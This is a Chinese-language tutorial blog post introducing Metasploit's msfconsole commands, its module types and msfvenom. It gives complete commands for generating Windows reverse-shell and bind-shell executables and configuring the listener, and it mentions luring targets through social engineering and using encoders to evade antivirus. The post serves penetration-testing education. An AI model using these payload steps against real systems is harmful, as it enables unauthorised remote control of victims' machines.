当前位置: 首页 > news >正文

MSF内的一些功能简介

MSFMetasploit Framework的简称,一个全球最知名的开源渗透测试框架。它主要用于安全评估、漏洞验证和渗透测试。msfconsole是 MSF 最主要、最常用的命令行交互界面,在 Kali 的终端输入 msfconsole 就可以启动了。

常见的一些指令:

help:显示出所有可以用的指令

search(关键词):可以搜索一些模块或者一些已知的历史漏洞等等

use(编号或者路径):使用选定的模块

show options:查看当前模块需要配置的参数

set(参数):填写参数

workspace:管理工作区,用于隔离不同项目的数据

run:运行

会使用这些常见的指令就可以运行大部分模块的内容了,接下来介绍 MSF 中主要的模块内容

Exploits (漏洞利用模块)针对特定系统或软件的漏洞,执行代码以获取目标系统访问权限。“破门工具”,利用漏洞打开目标系统的大门。
Payloads (载荷模块)在成功利用漏洞后,于目标系统上执行的代码(如建立Shell连接)。“进门后干的事”,比如建立连接、执行命令。
Auxiliary (辅助模块)执行扫描、指纹识别、拒绝服务等,但不建立Shell的模块。“侦察兵”,用于信息收集和探测。
Encoders (编码器模块)对Payload进行编码或混淆,以绕过防火墙或杀毒软件的检测。“伪装工具”,帮助Payload躲避安全软件的查杀。
Post-Exploitation (后渗透模块)在成功获取访问权后,用于进一步信息收集、权限维持等操作。“打扫战场”,在系统内深入探测和扩展战果。

msfvenom 是 MSF 框架中独立的 Payload 生成和编码工具,其核心作用就是生成一个能在目标系统上运行的程序。这个程序的作用通常是主动连接回攻击者的电脑,建立一个反向 Shell。之后,攻击者在 msfconsole 中设置监听,就能接收并控制这个 Shell。

msfvenom 的主要流程

使用 msfvenom 生成 Payload:在攻击机上,用 msfvenom 命令生成一个包含恶意代码的文件(如 payload.exe)。例如:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe(windows/meterpreter/reverse_tcp 是反向连接的 payload,LHOST 是本地的 IP 地址,就是 Kali 的 IP,LPORT 是默认的监听端口)

在目标系统上执行Payload:通过社会工程学、漏洞利用等方式,诱使目标系统运行这个 payload.exe 文件。

在msfconsole中监听连接:在攻击机上启动msfconsole,使用exploit/multi/handler模块设置一个与生成Payload时相同的监听器(IP和端口)

建立控制会话:一旦目标系统上的Payload被执行,它就会主动连接攻击机的监听器,从而建立一个控制会话(Meterpreter或Shell)

上述中提到了一个反向连接,那么其实也是有正向连接的,这两者的本质区别就是谁去连谁,谁主动发起网络连接,生成的payload是不同的:正向为bind_tcp类型(如 Payload windows/shel1/bind_tcp);反向为 reverse_tcp类型 (如windows/meterpreter/reverse_tcp)关键的参数不同:正向是rhost和lport;反向是lhost和lport

正向连接(Bind Shell)——“你去连它”工作流程:在目标机器上植入的Payload会开启一个端口(如4444)并监听。攻击者主动使用msfconsole去连接这个IP和端口。

图例

具体例子:
假设你在内网(192.168.1.0/24)里发现一台服务器(192.168.1.9)

# 1. 生成Payload(目标机运行)
msfvenom -p windows/shell/bind_tcp RHOST=0.0.0.0 LPORT=4444 -f exe -o bind.exe

# 2. msfconsole 设置监听(攻击机执行)
msfconsole
use exploit/multi/handler
set payload windows/shell/bind_tcp
set RHOST 192.168.1.9 # 目标是IP
set LPORT 4444 # 目标是端口
exploit # 攻击机主动去连接192.168.1.9:4444

反向连接 (Reverse Shell)——“让它来连你"工作流程:攻击者在自己的机器上开启监听端口(如4444)。植入目标机器的Payload运行后,会主动向外发起TCP连接,连接到你攻击机的IP和端口。

图列

具体例子:

假设你的攻击机有公网IP(如192.168.45.12),目标在内网。

# 1. 生成Payload(目标机运行)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.45.12 LPORT=4444 -f exe -o reverse.exe

# 2. msfconsole 设置监听(攻击机执行)
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0 # 监听本机所有网卡
set LPORT 4444 # 攻击机开放的端口
exploit # 攻击机开始等待目标连接

反向连接更为我们常用是因为企业的防火墙通常严进宽出(防止外部入侵,但允许内部上网)。目标机的Payload发起出站连接访问你的192.168.45.12:4444,通常会被防火墙放行,因此反向连接成功率远高于正向。

本文内容要在合法的范围内使用!!!

http://www.jsqmd.com/news/1163629/

相关文章:

  • 2026年7月最新郑州芝柏官方售后联系电话与客户服务中心网点地址 - 亨得利官方服务中心
  • 广州百达翡丽回收价格查询与各大回收平台实测排行(2026年7月最新) - 百达翡丽服务中心
  • Python新手最容易踩的10个隐式坑,我刚工作时踩了一半,直接导致线上数据统计出错
  • 亚马逊大幅改进 Alexa AI 处理多步骤任务,却面临极高成本难题
  • 2026 泰兴黄金回收避坑全攻略!3 家本地合规实体门店,大盘实时计价无任何隐形杂费 - 福金阁黄金回收
  • 2026年7月邵阳​市公共卫生许可证检测集中空调通风系统检测水质检测空气质量甲醛检测怎么做?正规CMA机构办理指南 - 绿呼吸检测中心
  • 仅影响左撇子的WordPress Bug,七年后终迎修复方案!
  • 【信息科学与工程学】计算机科学与自动化——第十篇 芯片设计21 芯片中的电学01
  • 微软裁员波及《毁灭战士》开发团队,引发能否运营好该工作室的疑问
  • 抖店群搬家怕批量扣分?抖掌柜 AI 检测标题图片类目,上架即合规 - 抖掌柜
  • 本溪GEO系统贴牌服务商靠谱源头厂商综合实力推荐TOP3:工业城市AI搜索布局,贴牌合作路径怎么选? - 科技快讯
  • 2026年“3+2贯通培养”模式大揭秘,究竟藏着怎样的升学新机遇?
  • Prefect工作流编排:从训练到评估的自动化实验流水线搭建
  • 项目型企业的交付闭环:项目、合同、成本、回款串成一条线怎么算清账
  • 网站建设公司选型核心逻辑解析,附10家优秀网站服务商推荐
  • 能源范式革命:AI全域渗透,推动能源体系从粗放供给到精准智能
  • Cloudflare推出Meerkat:QuePaxa算法助力,突破Raft局限实现全球共识实验
  • 2026 黄埔科学城工厂办公室搬迁攻略 无隐形收费本地搬家公司推荐 - 从来都是英雄出少年
  • 2026年白山GEO系统贴牌服务商靠谱源头厂商综合实力推荐TOP3:本地合伙人选择源头厂商的7个判断维度 - 小随科技
  • 2026年鄂尔多斯GEO系统贴牌服务商靠谱源头厂商综合实力推荐:源头厂商、贴牌能力与长期合作路径怎么判断? - 企业新闻快传
  • League Akari:基于LCU API的英雄联盟客户端智能自动化架构解析
  • 2026 靖江黄金回收避坑指南|主城 / 乡镇三大正规门店实测,实时金价无隐形收费 - 福金阁黄金回收
  • LangChain 聊天记录压缩:原理、机制与实战 - 若
  • 彻底分清:垂直分库、水平分库、垂直分表、水平分表(附 Mycat 完整配置)
  • 无货源自动拍单怎么选?重点看订单同步、货源关联、物流回传,抖掌柜一站式搞定 - 抖掌柜
  • 2026年通化GEO系统贴牌服务商靠谱源头厂商综合实力推荐TOP3:支持OEM贴牌、技术加盟的合作路径怎么选? - 科技快讯
  • AI Agent 面试题 686:Agent对齐(Alignment)的核心挑战和解决方案
  • 单调栈理解和实战
  • 远程操控自动机场起降,拼的不是胆量,而是系统
  • GRSL 2026 即插即用 | Transformer篇 | FEFFN:频域 - 空域联合建模,跨频交互,全局结构 + 局部细节全保留,根治传统 FFN 空间建模缺失